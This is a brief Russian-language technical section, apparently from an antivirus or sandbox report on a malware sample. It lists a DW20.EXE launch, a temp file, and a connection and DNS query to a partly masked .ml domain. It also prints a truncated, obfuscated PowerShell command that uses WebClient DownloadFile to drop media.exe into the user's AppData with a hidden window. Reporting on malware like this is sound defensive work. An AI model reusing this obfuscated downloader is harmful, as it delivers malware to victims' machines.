Техническая информация
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1193782.cvr
- 'ga####herseals.ml':443
- DNS ASK ga####herseals.ml
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $MMMMMM='C:\Users\'+ $env:UserNaMe +'\AppData\media.exe';((n`e`W`-obj`e`c`T (('N'+'e'+'t'+'.'+'W'+'e'+'b'+'c'+'l'+'i'+'e'+'n'+'t'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'F'+'i'+'l'+'e')).invoke((...' (со скрытым окном)